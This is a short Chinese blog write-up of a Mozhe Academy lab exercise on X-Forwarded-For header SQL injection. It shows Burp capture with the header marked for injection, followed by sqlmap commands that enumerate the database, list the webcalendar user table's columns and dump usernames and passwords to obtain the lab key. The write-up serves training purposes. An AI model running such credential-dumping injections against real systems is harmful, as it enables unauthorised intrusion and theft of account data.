墨者学院 – X-Forwarded-For注入漏洞实战Writeup

枫少@KillBoy SQL注入评论42,9021字数 237阅读0分47秒阅读模式

1.首先打开burp抓包,添加x-forwarded-for:*,将raw的信息存为txt文件,如下图所示

墨者学院 – X-Forwarded-For注入漏洞实战Writeup

2.爆出当前的数据库

sqlmap -r 1.txt --current-db --batch

3.爆表名

sqlmap -r 1.txt -D webcalendar -T user --columns --batch

4.爆表中的字段

sqlmap -r 1.txt -D webcalendar -T user -C username,password --dump --batch

5.得到帐号密码

墨者学院 – X-Forwarded-For注入漏洞实战Writeup

6.登陆获得KEY

墨者学院 – X-Forwarded-For注入漏洞实战Writeup

免责声明:本站某些文章、信息、图片、软件等来源于互联网,由本网整理发表,希望传递更多信息和学习之目的,并不意味赞同起观点或证实其内容的真实性以及非法用途。 如设计、版权等问题,请立即联系管理员,我们会给予更改或删除相关文章,保证您的权利。
高性能云服务器2折起
 
枫少@KillBoy
  • SQL注入
  • SQL注入实战
  • X-Forwarded-For注入
  • 墨者学院
匿名

发表评论

匿名网友

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: